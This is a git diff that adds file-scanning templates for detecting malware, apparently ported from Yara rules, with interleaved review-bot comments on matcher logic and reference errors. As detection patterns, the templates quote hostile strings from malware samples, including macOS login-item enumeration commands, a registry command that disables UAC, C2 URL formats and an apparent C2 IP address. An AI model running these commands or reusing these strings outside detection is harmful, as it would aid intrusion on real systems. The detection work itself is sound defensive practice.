+ - https://github.com/Yara-Rules/rules/blob/master/malware/MALW_MacGyver.yar
+ tags: malware,file
+
+file:
+ - extensions:
+ - all
+
+ matchers:
+ - type: word
+ part: raw
+ words:
+ - "delete -AID 315041592e5359532e4444463031"
+ - "install -file MacGyver.cap -nvDataLimit 1000 -instParam 00 -priv 4"
+ - "-mac_key 404142434445464748494a4b4c4d4e4f"
+ - "-enc_key 404142434445464748494a4b4c4d4e4f"
+ condition: and
\ No newline at end of file
diff --git a/file/malware/macgyver-malware.yaml b/file/malware/macgyver-malware.yaml
new file mode 100644
index 0000000000..c56023d78b
--- /dev/null
+++ b/file/malware/macgyver-malware.yaml
@@ -0,0 +1,27 @@
+id: macgyver-malware
+
+info:
+ name: MacGyver.cap Malware - Detect
+ author: daffainfo
+ severity: info
+ reference:
+ - https://github.com/fboldewin/MacGyver-s-return---An-EMV-Chip-cloning-case/blob/master/MacGyver's%20return%20-%20An%20EMV%20Chip%20cloning%20case.pdf
+ - https://github.com/Yara-Rules/rules/blob/master/malware/MALW_MacGyver.yar
+ tags: malware,file
+
+file:
+ - extensions:
+ - all
+
+ matchers:
+ - type: word
+ part: raw
+ words:
+ - "src/MacGyver/javacard/Header.cap"
+ - "src/MacGyver/javacard/Directory.cap"
+ - "src/MacGyver/javacard/Applet.cap"
+ - "src/MacGyver/javacard/Import.cap"
+ - "src/MacGyver/javacard/ConstantPool.cap"
+ - "src/MacGyver/javacard/Class.cap"
+ - "src/MacGyver/javacard/Method.cap"
+ condition: and
\ No newline at end of file
diff --git a/file/malware/madness-malware.yaml b/file/malware/madness-malware.yaml
new file mode 100644
index 0000000000..8ab243f4a9
--- /dev/null
+++ b/file/malware/madness-malware.yaml
@@ -0,0 +1,28 @@
+id: madness-malware
+
+info:
+ name: Madness DDOS Malware - Detect
+ author: daffainfo
+ severity: info
+ reference:
+ - https://github.com/arbor/yara/blob/master/madness.yara
+ - https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Madness.yar
+ tags: malware,file
+
+file:
+ - extensions:
+ - all
+
+ matchers:
+ - type: word
+ part: raw
+ words:
+ - "TW96aWxsYS81LjAgKFdpbmRvd3M7IFU7IFdpbmRvd3MgTlQgNS4xOyBlbi1VUzsgcnY6MS44LjAuNSkgR2Vja28vMjAwNjA3MzEgRmlyZWZveC8xLjUuMC41IEZsb2NrLzAuNy40LjE"
+ - "TW96aWxsYS81LjAgKFgxMTsgVTsgTGludXggMi40LjItMiBpNTg2OyBlbi1VUzsgbTE4KSBHZWNrby8yMDAxMDEzMSBOZXRzY2FwZTYvNi4wMQ=="
+ - "document.cookie="
+ - "[\"cookie\",\""
+ - "\"realauth="
+ - "\"location\"];"
+ - "d3Rm"
+ - "ZXhl"
+ condition: and
\ No newline at end of file
diff --git a/file/malware/miner--malware.yaml b/file/malware/miner--malware.yaml
new file mode 100644
index 0000000000..50884f91ce
--- /dev/null
+++ b/file/malware/miner--malware.yaml
@@ -0,0 +1,19 @@
+id: miner-malware
+
+info:
+ name: Miner Malware - Detect
+ author: daffainfo
+ severity: info
+ reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_XMRIG_Miner.yar
+ tags: malware,file
+
+file:
+ - extensions:
+ - all
+
+ matchers:
+ - type: word
+ part: raw
+ words:
+ - "stratum+tcp"
+ - "stratum+udp"
\ No newline at end of file
diff --git a/file/malware/miniasp3-malware.yaml b/file/malware/miniasp3-malware.yaml
new file mode 100644
index 0000000000..318b0f6d90
--- /dev/null
+++ b/file/malware/miniasp3-malware.yaml
@@ -0,0 +1,59 @@
+id: miniasp3-malware
+
+info:
+ name: MiniASP3 Malware - Detect
+ author: daffainfo
+ severity: info
+ reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_MiniAsp3_mem.yar
+ tags: malware,file
+
+file:
+ - extensions:
+ - all
+
+ matchers-condition: or
+ matchers:
+ - type: word
+ part: raw
+ words:
+ - "MiniAsp3\\Release\\MiniAsp.pdb"
+ - "http://%s/about.htm"
+ - "http://%s/result_%s.htm"
+ - "open internet failed…"
+ condition: and
+
+ - type: word
+ part: raw
+ words:
+ - "MiniAsp3\\Release\\MiniAsp.pdb"
+ - "http://%s/about.htm"
+ - "http://%s/result_%s.htm"
+ - "run error!"
+ condition: and
+
+ - type: word
+ part: raw
+ words:
+ - "MiniAsp3\\Release\\MiniAsp.pdb"
+ - "http://%s/about.htm"
+ - "http://%s/result_%s.htm"
+ - "run ok!"
+ condition: and
+
+ - type: word
+ part: raw
+ words:
+ - "MiniAsp3\\Release\\MiniAsp.pdb"
+ - "http://%s/about.htm"
+ - "http://%s/result_%s.htm"
+ - "time out,change to mode 0"
+ condition: and
+
+ - type: word
+ part: raw
+ words:
+ - "MiniAsp3\\Release\\MiniAsp.pdb"
+ - "http://%s/about.htm"
+ - "http://%s/result_%s.htm"
+ - "command is null!"
+ condition: and
diff --git a/file/malware/naikon-malware.yaml b/file/malware/naikon-malware.yaml
new file mode 100644
index 0000000000..bd0ac87b0d
--- /dev/null
+++ b/file/malware/naikon-malware.yaml
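Review bot: The file is added as `file/malware/miner--malware.yaml` (double hyphen) while its `id` is `miner-malware`; the other templates in this commit name the file after the id, so the path should be `file/malware/miner-malware.yaml`. The two words are the Stratum pool URI schemes (`stratum+tcp`, `stratum+udp`), which also appear in legitimate miner configuration and documentation, and with no `condition:` either one alone matches across `extensions: all`. The name "Miner Malware" overstates that; something like `name: Cryptominer Stratum URL - Detect`, plus a description saying hits need review, would set the right expectation for triage.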
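Review bot: The five `word` matchers in miniasp3-malware.yaml repeat the same three strings and differ only in the fourth, which makes the rule long and easy to desynchronise when one of the shared strings is edited. The same logic is expressed by two matchers under `matchers-condition: and`: the three common strings with `condition: and`, and the five status messages with `condition: or`. Separately, `open internet failed…` contains a single U+2026 ellipsis character; confirm that the sample bytes use that encoding rather than three ASCII dots, since a mismatch silently disables that alternative.

```yaml
  matchers-condition: and
  matchers:
    # strings common to every variant of the rule
    - type: word
      part: raw
      words:
        - "MiniAsp3\\Release\\MiniAsp.pdb"
        - "http://%s/about.htm"
        - "http://%s/result_%s.htm"
      condition: and

    # any one of the status messages
    - type: word
      part: raw
      words:
        - "open internet failed…"
        - "run error!"
        - "run ok!"
        - "time out,change to mode 0"
        - "command is null!"
      condition: or
```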
@@ -0,0 +1,31 @@
+id: naikon-malware
+
+info:
+ name: Naikon Malware - Detect
+ author: daffainfo
+ severity: info
+ reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Naikon.yar
+ tags: malware,file
+
+file:
+ - extensions:
+ - all
+
+ matchers-condition: or
+ matchers:
+ - type: binary
+ binary:
+ - "0FAFC1C1E01F"
+ - "355A010000"
+ - "81C27F140600"
+ condition: and
+
+ - type: word
+ part: raw
+ words:
+ - "NOKIAN95/WEB"
+ - "/tag=info&id=15"
+ - "skg(3)=&3.2d_u1"
+ - "\\Temp\\iExplorer.exe"
+ - "\\Temp\\\"TSG\""
+ condition: or
diff --git a/file/malware/naspyupdate-malware.yaml b/file/malware/naspyupdate-malware.yaml
new file mode 100644
index 0000000000..3ac092de7c
--- /dev/null
+++ b/file/malware/naspyupdate-malware.yaml
@@ -0,0 +1,27 @@
+id: naspyupdate-malware
+
+info:
+ name: nAspyUpdate Malware - Detect
+ author: daffainfo
+ severity: info
+ reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Naspyupdate.yar
+ tags: malware,file
+
+file:
+ - extensions:
+ - all
+
+ matchers-condition: or
+ matchers:
+ - type: binary
+ binary:
+ - "8A5424148A0132C202C28801414E75F4"
+
+ - type: word
+ part: raw
+ words:
+ - "\\httpclient.txt"
+ - "password <=14"
+ - "/%ldn.txt"
+ - "Kill You\x00"
+ condition: or
diff --git a/file/malware/notepad-malware.yaml b/file/malware/notepad-malware.yaml
new file mode 100644
index 0000000000..6d4880f8f2
--- /dev/null
+++ b/file/malware/notepad-malware.yaml
@@ -0,0 +1,19 @@
+id: notepad-malware
+
+info:
+ name: Notepad v1.1 Malware - Detect
+ author: daffainfo
+ severity: info
+ reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Notepad.yar
+ tags: malware,file
+
+file:
+ - extensions:
+ - all
+
+ matchers:
+ - type: word
+ part: raw
+ words:
+ - "75BAA77C842BE168B0F66C42C7885997"
+ - "B523F63566F407F3834BCC54AAA32524"
\ No newline at end of file
diff --git a/file/malware/olyx-malware.yaml b/file/malware/olyx-malware.yaml
new file mode 100644
index 0000000000..8bfb443752
--- /dev/null
+++ b/file/malware/olyx-malware.yaml
@@ -0,0 +1,26 @@
+id: olyx-malware
+
+info:
+ name: Olyx Malware - Detect
+ author: daffainfo
+ severity: info
+ reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Olyx.yar
+ tags: malware,file
+
+file:
+ - extensions:
+ - all
+
+ matchers-condition: or
+ matchers:
+ - type: word
+ part: raw
+ words:
+ - "/Applications/Automator.app/Contents/MacOS/DockLight"
+ condition: or
+
+ - type: binary
+ binary:
+ - "C7400436363636C7400836363636"
+ - "C740045C5C5C5CC740085C5C5C5C"
+ condition: or
diff --git a/file/malware/osx-leverage-malware.yaml b/file/malware/osx-leverage-malware.yaml
new file mode 100644
index 0000000000..47ca40521b
--- /dev/null
+++ b/file/malware/osx-leverage-malware.yaml
@@ -0,0 +1,25 @@
+id: osx-leverage-malware
+
+info:
+ name: OSX Leverage Malware - Detect
+ author: daffainfo
+ severity: info
+ reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_OSX_Leverage.yar
+ tags: malware,file
+
+file:
+ - extensions:
+ - all
+
+ matchers:
+ - type: word
+ part: raw
+ words:
+ - "ioreg -l | grep \"IOPlatformSerialNumber\" | awk -F"
+ - "+:Users:Shared:UserEvent.app:Contents:MacOS:"
+ - "rm '/Users/Shared/UserEvent.app/Contents/Resources/UserEvent.icns'"
+ - "osascript -e 'tell application \"System Events\" to get the hidden of every login item'"
+ - "osascript -e 'tell application \"System Events\" to get the name of every login item'"
+ - "osascript -e 'tell application \"System Events\" to get the path of every login item'"
+ - "serverVisible \x00"
+ condition: and
\ No newline at end of file
diff --git a/file/malware/paradox-malware.yaml b/file/malware/paradox-malware.yaml
new file mode 100644
index 0000000000..a1e868b53b
--- /dev/null
+++ b/file/malware/paradox-malware.yaml
@@ -0,0 +1,25 @@
+id: paradox-malware
+
+info:
+ name: Paradox Malware - Detect
+ author: daffainfo
+ severity: info
+ reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar
+ tags: malware,file
+
+file:
+ - extensions:
+ - all
+
+ matchers:
+ - type: word
+ part: raw
+ words:
+ - "ParadoxRAT"
+ - "Form1"
+ - "StartRMCam"
+ - "Flooders"
+ - "SlowLaris"
+ - "SHITEMID"
+ - "set_Remote_Chat"
+ condition: and
\ No newline at end of file
diff --git a/file/malware/plasma-malware.yaml b/file/malware/plasma-malware.yaml
new file mode 100644
index 0000000000..f777e38f46
--- /dev/null
+++ b/file/malware/plasma-malware.yaml
@@ -0,0 +1,27 @@
+id: plasma-malware
+
+info:
+ name: Plasma Malware - Detect
+ author: daffainfo
+ severity: info
+ reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar
+ tags: malware,file
+
+file:
+ - extensions:
+ - all
+
+ matchers:
+ - type: word
+ part: raw
+ words:
+ - "Miner: Failed to Inject."
+ - "Started GPU Mining on:"
+ - "BK: Hard Bot Killer Ran Successfully!"
+ - "Uploaded Keylogs Successfully!"
+ - "No Slowloris Attack is Running!"
+ - "An ARME Attack is Already Running on"
+ - "Proactive Bot Killer Enabled!"
+ - "PlasmaRAT"
+ - "AntiEverything"
+ condition: and
\ No newline at end of file
diff --git a/file/malware/poetrat-malware.yaml b/file/malware/poetrat-malware.yaml
new file mode 100644
index 0000000000..bdc0827515
--- /dev/null
+++ b/file/malware/poetrat-malware.yaml
@@ -0,0 +1,34 @@ +id: poetrat-malware + +info: + name: PoetRat Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_PoetRATDoc.yar + tags: malware,file + +file: + - extensions: + - all + + matchers-condition: and + matchers: + - type: word + part: raw + words: + - "launcher.py" + - "smile.zip" + - "smile_funs.py" + - "frown.py" + - "backer.py" + - "smile.py" + - "affine.py" + - "cmd" + - ".exe" + condition: and + + - type: regex + regex: + - '(\.py$|\.pyc$|\.pyd$|Python)' + - '\.dll' + condition: and \ No newline at end of file diff --git a/file/malware/pony-malware.yaml b/file/malware/pony-malware.yaml new file mode 100644 index 0000000000..f919ab5a80 --- /dev/null +++ b/file/malware/pony-malware.yaml @@ -0,0 +1,22 @@ +id: pony-malware + +info: + name: Pony Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Pony.yar + tags: malware,file + +file: + - extensions: + - all + + matchers: + - type: word + part: raw + words: + - "{%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}" + - "YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0" + - "POST %s HTTP/1.0" + - "Accept-Encoding: identity, *;q=0" + condition: and \ No newline at end of file diff --git a/file/malware/pubsab-malware.yaml b/file/malware/pubsab-malware.yaml new file mode 100644 index 0000000000..ade33db854 --- /dev/null +++ b/file/malware/pubsab-malware.yaml @@ -0,0 +1,26 @@ +id: pubsab-malware + +info: + name: PubSab Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_PubSab.yar + tags: malware,file + +file: + - extensions: + - all + + matchers-condition: or + matchers: + - type: word + part: raw + words: + - "_deamon_init" + - "com.apple.PubSabAgent" + - "/tmp/screen.jpeg" + condition: or + + - type: binary + binary: + - "6B45E43789CA29C28955E4" \ No newline at end of file 
diff --git a/file/malware/punisher-malware.yaml b/file/malware/punisher-malware.yaml new file mode 100644 index 0000000000..45b9c0c608 --- /dev/null +++ b/file/malware/punisher-malware.yaml @@ -0,0 +1,30 @@ +id: punisher-malware + +info: + name: Punisher Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar + tags: malware,file + +file: + - extensions: + - all + + matchers-condition: and + matchers: + - type: word + part: raw + words: + - "abccba" + - "SpyTheSpy" + - "wireshark" + - "apateDNS" + - "abccbaDanabccb" + condition: and + + - type: binary + binary: + - "5C006800660068002E007600620073" + - "5C00730063002E007600620073" + condition: and \ No newline at end of file diff --git a/file/malware/pypi-malware.yaml b/file/malware/pypi-malware.yaml new file mode 100644 index 0000000000..a03e0c6773 --- /dev/null +++ b/file/malware/pypi-malware.yaml @@ -0,0 +1,23 @@ +id: pypi-malware + +info: + name: Fake PyPI Malware - Detect + author: daffainfo + severity: info + reference: + - http://www.nbu.gov.sk/skcsirt-sa-20170909-pypi/ + - https://github.com/Yara-Rules/rules/blob/master/malware/MALW_PyPI.yar + tags: malware,file + +file: + - extensions: + - all + + matchers: + - type: word + part: raw + words: + - "# Welcome Here! :)" + - "# just toy, no harm :)" + - "[0x76,0x21,0xfe,0xcc,0xee]" + condition: and \ No newline at end of file diff --git a/file/malware/pythorat-malware.yaml b/file/malware/pythorat-malware.yaml new file mode 100644 index 0000000000..e5fb6642a4 --- /dev/null +++ b/file/malware/pythorat-malware.yaml 
@@ -0,0 +1,26 @@ +id: pythorat-malware + +info: + name: PythoRAT Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar + tags: malware,file + +file: + - extensions: + - all + + matchers: + - type: word + part: raw + words: + - "TKeylogger" + - "uFileTransfer" + - "TTDownload" + - "SETTINGS" + - "Unknown" + - "#@#@#" + - "PluginData" + - "OnPluginMessage" + condition: and diff --git a/file/malware/qrat-malware.yaml b/file/malware/qrat-malware.yaml new file mode 100644 index 0000000000..76853066d2 --- /dev/null +++ b/file/malware/qrat-malware.yaml @@ -0,0 +1,49 @@ +id: qrat-malware + +info: + name: QRat Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar + tags: malware,file + +file: + - extensions: + - all + + matchers-condition: or + matchers: + - type: word + part: raw + words: + - "quaverse/crypter" + - "Qrypt.class" + - "Jarizer.class" + - "URLConnection.class" + condition: and + + - type: word + part: raw + words: + - "e-data" + - "Qrypt.class" + - "Jarizer.class" + - "URLConnection.class" + condition: and + + - type: word + words: + - "e-data" + - "quaverse/crypter" + - "Jarizer.class" + - "URLConnection.class" + condition: and + + - type: word + part: raw + words: + - "e-data" + - "quaverse/crypter" + - "Qrypt.class" + - "URLConnection.class" + condition: and diff --git a/file/malware/satana-dropper-malware.yaml b/file/malware/satana-dropper-malware.yaml new file mode 100644 index 0000000000..c82a39dc6c --- /dev/null +++ b/file/malware/satana-dropper-malware.yaml 
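Review bot: The third word matcher in qrat-malware.yaml (the one listing `e-data`, `quaverse/crypter`, `Jarizer.class`, `URLConnection.class`) omits `part: raw`, while the other three matchers in the same template set it. If the file protocol falls back to the raw content this is harmless, but the difference reads as if that matcher targets something else; add `part: raw` so all four blocks are alike. A one-line comment above `matchers:` would also help, for example `# URLConnection.class plus any three of: e-data, quaverse/crypter, Qrypt.class, Jarizer.class`, since that is what the four near-duplicate lists encode.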
@@ -0,0 +1,20 @@ +id: satana-dropper-malware + +info: + name: Satana Dropper Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RANSOM_Satana.yar + tags: malware,file + +file: + - extensions: + - all + + matchers: + - type: binary + binary: + - "25732D547279457863657074" + - "643A5C6C626574776D77795C75696A657571706C667775622E706462" + - "71666E7476746862" + condition: and \ No newline at end of file diff --git a/file/malware/satana-malware.yaml b/file/malware/satana-malware.yaml new file mode 100644 index 0000000000..01e87bbeec --- /dev/null +++ b/file/malware/satana-malware.yaml @@ -0,0 +1,28 @@ +id: satana-malware + +info: + name: Satana Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RANSOM_.CRYPTXXX.yar + tags: malware,file + +file: + - extensions: + - all + + matchers-condition: and + matchers: + - type: binary + binary: + - "210073006100740061006E00610021002E0074007800740000" + - "456E756D4C6F63616C526573" + - "574E65744F70656E456E756D5700" + - "21534154414E4121" + condition: and + + - type: binary + binary: + - "7467777975677771" + - "537776776E6775" + condition: or \ No newline at end of file diff --git a/file/malware/shimrat-malware.yaml b/file/malware/shimrat-malware.yaml new file mode 100644 index 0000000000..3a75f5be23 --- /dev/null +++ b/file/malware/shimrat-malware.yaml 
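Review bot: The `reference` in satana-malware.yaml points at `RANSOM_.CRYPTXXX.yar`, while satana-dropper-malware.yaml, added just before it in this commit, cites `RANSOM_Satana.yar`; this looks like a copy-paste slip. An analyst triaging a hit follows this link to see which upstream signature the hex strings come from, so a wrong file sends them to an unrelated ransomware family. Presumably it should read `reference: https://github.com/Yara-Rules/rules/blob/master/malware/RANSOM_Satana.yar`; confirm against the upstream repository before changing it.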
@@ -0,0 +1,42 @@ +id: shimrat-malware + +info: + name: ShimRat Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Shim.yar + tags: malware,file + +file: + - extensions: + - all + + matchers-condition: or + matchers: + - type: word + part: raw + words: + - ".dll" + - ".dat" + - "QWERTYUIOPLKJHG" + - "MNBVCXZLKJHGFDS" + condition: and + + - type: word + part: raw + words: + - "Data$$00" + - "Data$$01%c%sData" + condition: and + + - type: word + part: raw + words: + - "ping localhost -n 9 /c %s > nul" + - "Demo" + - "Win32App" + - "COMSPEC" + - "ShimMain" + - "NotifyShims" + - "GetHookAPIs" + condition: and \ No newline at end of file diff --git a/file/malware/shimratreporter-malware.yaml b/file/malware/shimratreporter-malware.yaml new file mode 100644 index 0000000000..98d2b9a06c --- /dev/null +++ b/file/malware/shimratreporter-malware.yaml @@ -0,0 +1,30 @@ +id: shimratreporter-malware + +info: + name: ShimRatReporter Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Shim.yar + tags: malware,file + +file: + - extensions: + - all + + matchers: + - type: word + part: raw + words: + - "IP-INFO" + - "Network-INFO" + - "OS-INFO" + - "Process-INFO" + - "Browser-INFO" + - "QueryUser-INFO" + - "Users-INFO" + - "Software-INFO" + - "%02X-%02X-%02X-%02X-%02X-%02X" + - "(from environment) = %s" + - "NetUserEnum" + - "GetNetworkParams" + condition: and diff --git a/file/malware/sigma-malware.yaml b/file/malware/sigma-malware.yaml new file mode 100644 index 0000000000..70eca55e9b --- /dev/null +++ b/file/malware/sigma-malware.yaml 
@@ -0,0 +1,27 @@ +id: sigma-malware + +info: + name: Sigma Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RANSOM_Sigma.yar + tags: malware,file + +file: + - extensions: + - all + + matchers: + - type: word + part: raw + words: + - ".php?" + - "uid=" + - "&uname=" + - "&os=" + - "&pcname=" + - "&total=" + - "&country=" + - "&network=" + - "&subid=" + condition: and \ No newline at end of file diff --git a/file/malware/smallnet-malware.yaml b/file/malware/smallnet-malware.yaml new file mode 100644 index 0000000000..80cf24245b --- /dev/null +++ b/file/malware/smallnet-malware.yaml @@ -0,0 +1,28 @@ +id: smallnet-malware + +info: + name: SmallNet Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar + tags: malware,file + +file: + - extensions: + - all + + matchers: + - type: word + part: raw + words: + - "!!<3SAFIA<3!!" + - "!!ElMattadorDz!!" + condition: or + + - type: word + part: raw + words: + - "stub_2.Properties" + - "stub.exe" + - "get_CurrentDomain" + condition: and \ No newline at end of file diff --git a/file/malware/snake-malware.yaml b/file/malware/snake-malware.yaml new file mode 100644 index 0000000000..5940273e81 --- /dev/null +++ b/file/malware/snake-malware.yaml 
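Review bot: smallnet-malware.yaml declares two matchers but no `matchers-condition`, so they are combined with the default `or`. The template therefore fires on a file that contains only one of the two marker strings, or only the three generic strings `stub_2.Properties`, `stub.exe` and `get_CurrentDomain`. The split into an `or` group and an `and` group suggests the upstream rule wants a marker together with the stub strings (not verifiable from this hunk); if so, add `matchers-condition: and` above `matchers:`. If either group alone is really intended, write `matchers-condition: or` explicitly, as the other two-matcher templates in this commit do.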
@@ -0,0 +1,25 @@ +id: snake-malware + +info: + name: Snake Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RANSOM_Snake.yar + tags: malware,file + +file: + - extensions: + - all + + matchers-condition: and + matchers: + - type: word + part: raw + words: + - "Go build ID: \"X6lNEpDhc_qgQl56x4du/fgVJOqLlPCCIekQhFnHL/rkxe6tXCg56Ez88otHrz/Y-lXW-OhiIbzg3-ioGRz\"" + + - type: binary + binary: + - "89C8BB00CA9A3B89D1F7E381E1FFFFFF3F89C301C889C60500001A3D89042469ED00CA9A3B01EA89CDC1F91F01EB11CA81C600001A3D81D2EB03B2A189542404E81062F6FF" + - "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" + condition: and \ No newline at end of file diff --git a/file/malware/sub7nation-malware.yaml b/file/malware/sub7nation-malware.yaml new file mode 100644 index 0000000000..9336dd7bbe --- /dev/null +++ b/file/malware/sub7nation-malware.yaml @@ -0,0 +1,31 @@ +id: sub7nation-malware + +info: + name: Sub7Nation Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar + tags: malware,file + +file: + - extensions: + - all + + matchers: + - type: word + part: raw + words: + - "EnableLUA /t REG_DWORD /d 0 /f" + - "*A01*" + - "*A02*" + - "*A03*" + - "*A04*" + - "*A05*" + - "*A06*" + - "#@#@#" + - "HostSettings" + - "sevane.tmp" + - "cmd_.bat" + - "a2b7c3d7e4" + - "cmd.dll" + condition: and diff --git a/file/malware/t5000-malware.yaml b/file/malware/t5000-malware.yaml new file mode 100644 index 0000000000..a3fc68f0e0 --- /dev/null +++ b/file/malware/t5000-malware.yaml 
@@ -0,0 +1,32 @@ +id: t5000-malware + +info: + name: T5000 Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_T5000.yar + tags: malware,file + +file: + - extensions: + - all + + matchers: + - type: word + part: raw + words: + - "_tmpR.vbs" + - "_tmpg.vbs" + - "Dtl.dat" + - "3C6FB3CA-69B1-454f-8B2F-BD157762810E" + - "EED5CA6C-9958-4611-B7A7-1238F2E1B17E" + - "8A8FF8AD-D1DE-4cef-B87C-82627677662E" + - "43EE34A9-9063-4d2c-AACD-F5C62B849089" + - "A8859547-C62D-4e8b-A82D-BE1479C684C9" + - "A59CF429-D0DD-4207-88A1-04090680F714" + - "utd_CE31" + - "f:\\Project\\T5000\\Src\\Target\\1 KjetDll.pdb" + - "l:\\MyProject\\Vc 7.1\\T5000\\T5000Ver1.28\\Target\\4 CaptureDLL.pdb" + - "f:\\Project\\T5000\\Src\\Target\\4 CaptureDLL.pdb" + - "E:\\VS2010\\xPlat2\\Release\\InstRes32.pdb" + condition: or \ No newline at end of file diff --git a/file/malware/tedroo-malware.yaml b/file/malware/tedroo-malware.yaml new file mode 100644 index 0000000000..0ca935a0c8 --- /dev/null +++ b/file/malware/tedroo-malware.yaml @@ -0,0 +1,19 @@ +id: tedroo-malware + +info: + name: Tedroo Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Tedroo.yar + tags: malware,file + +file: + - extensions: + - all + + matchers: + - type: binary + binary: + - "257325732E657865" + - "5F6C6F672E747874" + condition: and \ No newline at end of file diff --git a/file/malware/terminator-malware.yaml b/file/malware/terminator-malware.yaml new file mode 100644 index 0000000000..82645aa4c9 --- /dev/null +++ b/file/malware/terminator-malware.yaml 
@@ -0,0 +1,20 @@ +id: terminator-malware + +info: + name: Terminator Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Terminator.yar + tags: malware,file + +file: + - extensions: + - all + + matchers: + - type: word + part: raw + words: + - "Accelorator" + - "12356" + condition: and diff --git a/file/malware/teslacrypt-malware.yaml b/file/malware/teslacrypt-malware.yaml new file mode 100644 index 0000000000..b89352ca1a --- /dev/null +++ b/file/malware/teslacrypt-malware.yaml @@ -0,0 +1,17 @@ +id: teslacrypt-malware + +info: + name: TeslaCrypt Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RANSOM_TeslaCrypt.yar + tags: malware,file + +file: + - extensions: + - all + + matchers: + - type: binary + binary: + - "4E6F7720697427732025493A254D25702E00000076616C2069732025640A0000" diff --git a/file/malware/tox-malware.yaml b/file/malware/tox-malware.yaml new file mode 100644 index 0000000000..fb71d2c6d2 --- /dev/null +++ b/file/malware/tox-malware.yaml @@ -0,0 +1,35 @@ +id: tox-malware + +info: + name: Tox Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RANSOM_Tox.yar + tags: malware,file + +file: + - extensions: + - all + + matchers-condition: or + matchers: + - type: word + part: raw + words: + - "n:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t;<>><<<" + condition: and + + - type: word + part: raw + words: + - "n:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t;<>><<<" + condition: and \ No newline at end of file diff --git a/file/malware/treasurehunt-malware.yaml b/file/malware/treasurehunt-malware.yaml new file mode 100644 index 0000000000..c47c1fa499 --- /dev/null +++ b/file/malware/treasurehunt-malware.yaml 
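Review bot: The two word matchers in tox-malware.yaml are byte-for-byte identical, so under `matchers-condition: or` the second adds nothing. If it was meant to cover a different encoding of the same string from the upstream rule (not visible in this hunk), a `word` matcher on the raw bytes cannot express that, and it would need a `binary` matcher holding the encoded hex. Otherwise, drop the duplicate block together with the `matchers-condition: or` line so the template shows a single signature.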
@@ -0,0 +1,23 @@ +id: treasurehunt-malware + +info: + name: Trickbot Malware - Detect + author: daffainfo + severity: info + reference: + - http://www.minerva-labs.com/#!Cybercriminals-Adopt-the-Mossad-Emblem/c7a5/573da2d60cf2f90ca6f6e3ed + - https://github.com/Yara-Rules/rules/blob/master/malware/MALW_TreasureHunt.yar + tags: malware,file + +file: + - extensions: + - all + + matchers: + - type: word + part: raw + words: + - "treasureHunter.pdb" + - "jucheck" + - "cmdLineDecrypted" + condition: and \ No newline at end of file diff --git a/file/malware/trickbot-malware.yaml b/file/malware/trickbot-malware.yaml new file mode 100644 index 0000000000..8952cddcb8 --- /dev/null +++ b/file/malware/trickbot-malware.yaml @@ -0,0 +1,23 @@ +id: trickbot-malware + +info: + name: Trickbot Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_TrickBot.yar + tags: malware,file + +file: + - extensions: + - all + + matchers: + - type: word + part: raw + words: + - "moduleconfig" + - "Start" + - "Control" + - "FreeBuffer" + - "Release" + condition: and \ No newline at end of file diff --git a/file/malware/trumpbot-malware.yaml b/file/malware/trumpbot-malware.yaml new file mode 100644 index 0000000000..d940cf10c1 --- /dev/null +++ b/file/malware/trumpbot-malware.yaml @@ -0,0 +1,20 @@ +id: trumpbot-malware + +info: + name: TrumpBot Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Trumpbot.yar + tags: malware,file + +file: + - extensions: + - all + + matchers: + - type: word + part: raw + words: + - "trumpisdaddy" + - "198.50.154.188" + condition: and \ No newline at end of file diff --git a/file/malware/universal-1337-malware.yaml b/file/malware/universal-1337-malware.yaml new file mode 100644 index 0000000000..939e130630 --- /dev/null +++ b/file/malware/universal-1337-malware.yaml 
